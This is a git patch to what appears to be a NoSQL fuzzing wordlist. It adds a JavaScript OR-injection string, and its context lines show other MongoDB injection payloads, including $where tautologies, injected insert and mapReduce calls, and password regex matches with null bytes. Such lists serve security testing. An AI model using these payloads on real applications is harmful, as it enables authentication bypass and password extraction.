From 68fe48d9dd781a7d1d60b0270ce84a0594537e3a Mon Sep 17 00:00:00 2001 From: Daniel Neal Date: Mon, 14 Sep 2020 21:55:24 -0700 Subject: [PATCH] Add string js or injection --- Fuzzing/Databases/NoSQL.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/Fuzzing/Databases/NoSQL.txt b/Fuzzing/Databases/NoSQL.txt index 4ab698a4..f30ad0b9 100644 --- a/Fuzzing/Databases/NoSQL.txt +++ b/Fuzzing/Databases/NoSQL.txt @@ -9,6 +9,7 @@ $where: '1 == 1' db.injection.insert({success:1}); db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 || 1==1 +' || 'a'=='a ' && this.password.match(/.*/)//+%00 ' && this.passwordzz.match(/.*/)//+%00 '%20%26%26%20this.password.match(/.*/)//+%00